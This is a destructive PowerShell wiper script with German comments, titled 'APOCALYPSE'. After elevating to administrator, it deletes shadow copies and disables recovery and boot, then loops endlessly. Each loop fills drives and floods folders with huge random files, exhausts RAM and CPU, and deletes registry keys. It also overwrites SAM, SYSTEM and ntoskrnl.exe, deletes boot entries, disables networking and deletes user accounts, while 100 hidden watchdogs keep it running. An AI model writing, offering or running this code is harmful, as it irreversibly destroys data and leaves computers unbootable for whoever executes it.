# ================================
# MAIN2PACKET APOCALYPSE v10.0 - RATED 10/10 DESTRUCTION
# ================================

# Administrator-Rechte + maximaler Schaden
if (-NOT ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")) {
    Start-Process PowerShell -Verb RunAs -ArgumentList "-NoProfile -ExecutionPolicy Bypass -File `"$PSCommandPath`""
    exit
}

# System wiederherstellung deaktivieren
try {
    Disable-ComputerRestore -Drive "C:\" -ErrorAction SilentlyContinue
    vssadmin delete shadows /all /quiet
    bcdedit /set {default} bootstatuspolicy ignoreallfailures
    bcdedit /set {default} recoveryenabled No
} catch {}

# Fenster komplett unsichtbar
Add-Type -Name Window -Namespace Console -MemberDefinition '
[DllImport("Kernel32.dll")]
public static extern IntPtr GetConsoleWindow();
[DllImport("User32.dll")]
public static extern bool ShowWindow(IntPtr hWnd, int nCmdShow);
'
$consolePtr = [Console.Window]::GetConsoleWindow()
[Console.Window]::ShowWindow($consolePtr, 0)

# ===== KONFIGURATION - MAXIMUM =====
$ErrorActionPreference = "SilentlyContinue"
$global:threads = 999  # Maximale Threads
$global:terror = $true

# ALLE LAUFWERKE
$allDrives = Get-WmiObject Win32_LogicalDisk | Where-Object {$_.DriveType -eq 3} | ForEach-Object { $_.DeviceID }
$allUSBs = Get-WmiObject Win32_LogicalDisk | Where-Object {$_.DriveType -eq 2} | ForEach-Object { $_.DeviceID }
$allNetwork = Get-WmiObject Win32_LogicalDisk | Where-Object {$_.DriveType -eq 4} | ForEach-Object { $_.DeviceID }

# ALLE BENUTZERORDNER
$users = Get-ChildItem "C:\Users" -Directory | Where-Object {$_.Name -notin @('Public', 'Default', 'All Users')}
$alleZiele = @()

foreach ($user in $users) {
    $alleZiele += @(
        "$($user.FullName)\Desktop",
        "$($user.FullName)\Documents",
        "$($user.FullName)\Downloads",
        "$($user.FullName)\Pictures",
        "$($user.FullName)\Music",
        "$($user.FullName)\Videos",
        "$($user.FullName)\AppData\Local",
        "$($user.FullName)\AppData\Roaming",
        "$($user.FullName)\AppData\Local\Temp"
    )
}

# SYSTEMZIELE
$alleZiele += @(
    "C:\Windows\Temp",
    "C:\ProgramData",
    "C:\Windows\System32\Tasks",
    "C:\Windows\System32\config",
    "C:\Windows\System32\drivers\etc"
)

# ===== 100 WATCHDOGS =====
for ($w = 1; $w -le 100; $w++) {
    $watchdog = @"
while(`$true) {
    `$p = Get-Process powershell -ErrorAction SilentlyContinue
    if (`$p.Count -lt 100) {
        Start-Process powershell -WindowStyle Hidden -ArgumentList "-NoProfile -ExecutionPolicy Bypass -File `"$using:PSCommandPath`""
    }
    Start-Sleep -Milliseconds 100
}
"@
    $watchdog | Out-File "$env:TEMP\wd_$w.ps1" -Encoding UTF8 -Force
    Start-Process powershell -WindowStyle Hidden -ArgumentList "-NoProfile -ExecutionPolicy Bypass -File `"$env:TEMP\wd_$w.ps1`""
}

# ===== HAUPTSCHLEIFE - NIVEAU 10/10 =====
Write-Host "[APOCALYPSE] INITIATING 10/10 DESTRUCTION" -ForegroundColor Red

# UNENDLICHE SCHLEIFE
while ($global:terror) {
    $round = Get-Random
    
    # 1. ALLE LAUFWERKE VOLLMACHEN (BIS ZUM LETZTEN BYTE)
    foreach ($drive in $allDrives) {
        try {
            $driveLetter = $drive[0]
            $fillFile = "$drive\FILL_$round.bin"
            $stream = [System.IO.File]::OpenWrite($fillFile)
            $stream.SetLength(1TB)  # Versucht 1TB zu allozieren
            $stream.Close()
        } catch {}
    }
    
    # 2. PARALLELE DATEIEN-FLUT (1 MILLION DATEIEN PRO RUNDE)
    $zielJobs = @()
    foreach ($ziel in $alleZiele) {
        if (Test-Path $ziel) {
            $zielJobs += Start-ThreadJob -ScriptBlock {
                $z = $args[0]
                $r = $args[1]
                
                # 1000 Ordner pro Ziel
                for ($folder = 1; $folder -le 1000; $folder++) {
                    $path = Join-Path $z "APOC_${r}_$folder"
                    New-Item -Path $path -ItemType Directory -Force | Out-Null
                    
                    # 1000 Dateien pro Ordner
                    for ($file = 1; $file -le 1000; $file++) {
                        $filePath = Join-Path $path "file_$file.10"
                        
                        # 100MB pro Datei
                        $bytes = New-Object byte[] (100 * 1024 * 1024)
                        (New-Object Random).NextBytes($bytes)
                        [System.IO.File]::WriteAllBytes($filePath, $bytes)
                    }
                }
            } -ArgumentList $ziel, $round
        }
    }
    
    # 3. RAM VERBRAUCH (ALLES)
    $ramJobs = @()
    for ($r = 1; $r -le 100; $r++) {
        $ramJobs += Start-ThreadJob -ScriptBlock {
            $data = @()
            while ($true) {
                $data += New-Object byte[] (1GB)  # 1GB pro Job
                Start-Sleep -Milliseconds 10
            }
        }
    }
    
    # 4. CPU MAX (ALLE KERNE 100%)
    $cpuJobs = @()
    for ($c = 1; $c -le ([Environment]::ProcessorCount * 10); $c++) {
        $cpuJobs += Start-ThreadJob -ScriptBlock {
            while ($true) {
                $x = 0
                for ($i = 0; $i -lt 10000000; $i++) {
                    $x += [Math]::Sqrt($i) * [Math]::Sin($i)
                }
            }
        }
    }
    
    # 5. REGISTRY ZERSTÖREN
    $regJobs = @()
    for ($r = 1; $r -le 100; $r++) {
        $regJobs += Start-ThreadJob -ScriptBlock {
            $base = "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion"
            $keys = @("Run", "RunOnce", "Policies", "Explorer")
            
            foreach ($key in $keys) {
                $path = "$base\$key"
                if (Test-Path $path) {
                    Remove-Item -Path $path -Recurse -Force -ErrorAction SilentlyContinue
                }
            }
            
            # Neue Keys mit Millionen Werten
            for ($k = 1; $k -le 10000; $k++) {
                New-Item -Path "HKLM:\SOFTWARE\APOC_$k" -Force | Out-Null
                for ($v = 1; $v -le 1000; $v++) {
                    New-ItemProperty -Path "HKLM:\SOFTWARE\APOC_$k" -Name "Value_$v" -Value ("X" * 100000) -Force | Out-Null
                }
            }
        }
    }
    
    # 6. BOOTKONFIGURATION ZERSTÖREN
    try {
        bcdedit /delete {default} /f
        bcdedit /delete {current} /f
        bootrec /fixmbr
        bootrec /fixboot
    } catch {}
    
    # 7. SYSTEMDATEIEN ÜBERSCHREIBEN
    $systemFiles = @(
        "C:\Windows\System32\config\SAM",
        "C:\Windows\System32\config\SYSTEM",
        "C:\Windows\System32\config\SOFTWARE",
        "C:\Windows\System32\drivers\etc\hosts",
        "C:\Windows\System32\ntoskrnl.exe"
    )
    
    foreach ($file in $systemFiles) {
        try {
            $bytes = New-Object byte[] (1MB)
            (New-Object Random).NextBytes($bytes)
            [System.IO.File]::WriteAllBytes($file, $bytes)
        } catch {}
    }
    
    # 8. EVENTLOG ÜBERFLUTEN
    for ($e = 1; $e -le 100000; $e++) {
        try {
            Write-EventLog -LogName System -Source "Microsoft-Windows-Kernel-General" -EventId 9999 -Message ("APOCALYPSE " * 1000) -EntryType Error
        } catch {}
    }
    
    # 9. NETZWERK LAHMLEGEN
    try {
        netsh advfirewall set allprofiles state off
        ipconfig /release
        ipconfig /renew
        netsh interface set interface "Ethernet" disable
        netsh interface set interface "Wi-Fi" disable
    } catch {}
    
    # 10. BENUTZER KONTEN ZERSTÖREN
    foreach ($user in $users) {
        try {
            net user $user.Name /delete
        } catch {}
    }
    
    # ALLE JOBS KILLEN UND NEU STARTEN
    Get-Job | Stop-Job | Remove-Job
    
    # KEINE PAUSE - SOFORT NÄCHSTE RUNDE
    Write-Host "[ROUND $round] APOCALYPSE IN PROGRESS - 10/10" -ForegroundColor Red
}
